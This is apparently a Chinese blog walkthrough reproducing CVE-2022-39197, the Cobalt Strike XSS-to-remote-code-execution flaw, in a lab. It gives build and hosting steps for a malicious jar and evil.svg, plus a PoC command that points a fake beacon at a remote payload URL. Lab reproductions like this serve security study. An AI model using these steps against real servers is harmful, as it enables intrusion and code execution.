CVE-2022-39197(Cobalt Strike XSS <=4.7)漏洞复现(超详细)

0x00 漏洞概述

  2022年09月22日,360CERT监测发现了Cobalt Strike远程代码执行漏洞,漏洞编号为CVE-2022-39197,漏洞等级:严重,漏洞评分:9.8
  Cobalt Strike(也称CS)由美国Red Team开发,是一款基于java的内网渗透测试工具,是最早的公共红队指挥和控制框架之一。Cobalt Strike旨在通过模拟几种可能的攻击工具和场景,允许渗透测试人员和网络防御人员检查他们的安全专业的强度。然而,安全测试套件也被黑客(包括勒索软件团伙)广泛使用,以渗透目标网络。

0x01 漏洞详情

CVE-2022-39197: Cobalt Strike 远程代码执行漏洞
CVE: CVE-2022-39197

组件: Cobalt Strike

漏洞类型: 代码执行

影响: 服务器接管

简述: 该漏洞存在于Cobalt Strike的Beacon软件中,可能允许攻击者通过在Beacon配置中设置假用户名,触发XSS,进而在 CS Server上造成远程代码执行。

0x02 影响版本

Cobalt Strike <= 4.7

0x03 漏洞复现

复现环境说明

192.168.1.4 Cobalt Strike服务器(kali)
192.168.1.1 Python http服务器 放置远程加载 payload (EvilJar-1.0-jar-with-dependencies.jar和 evil.svg)
192.168.1.6 受害机器(Win7 反过来说他也是攻击机器 CVE-2022-39197.py)

CVE-2022-39197 RCE POC
目录文件介绍

│  cve-2022-39197.py  # POC	
│  README.md
│  requirements.txt		# python依赖
│
├─EvilJar
│  │  pom.xml			#依赖
│  │
│  ├─META-INF
│  │      MANIFEST.MF
│  │
│  └─src
│      └─main
│          └─java
│                  Exploit.java		#执行的命令
│
├─images
│      1.jpg
│
└─serve
        evil.svg								# 远程加载恶意文件
        EvilJar-1.0-jar-with-dependencies.jar	# 生成的jar包

3.1 启动 Cobalt Strike 本次复现版本为 4.3

./teamserver 192.168.1.4 123456
./start.sh

3.2 创建一个Listen 和 Windows Executable

在这里插入图片描述

在这里插入图片描述

3.3 下载 POC 编译 EvilJar-1.0-jar-with-dependencies.jar

git clone https://github.com/its-arun/CVE-2022-39197/

# mvn编译
mvn compile
mvn package

将 EvilJar-1.0-jar-with-dependencies.jar 移动到 serve/ 目录下
在serve目录下创建一个简易的http服务

python3 -m http.server 8000

在这里插入图片描述
修改 evil.svg
链接为简易http主机IP
简易http主机IP

3.4 执行POC 触发XSS

WIn7上线
python cve-2022-39197.py beacon.exe http://192.168.1.1:8000/evil.svg

查看进程列表触发 XSS 执行命令

在这里插入图片描述
在这里插入图片描述

0x04 修复建议

通用修补建议
根据影响版本中的信息,排查并升级到安全版本。

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值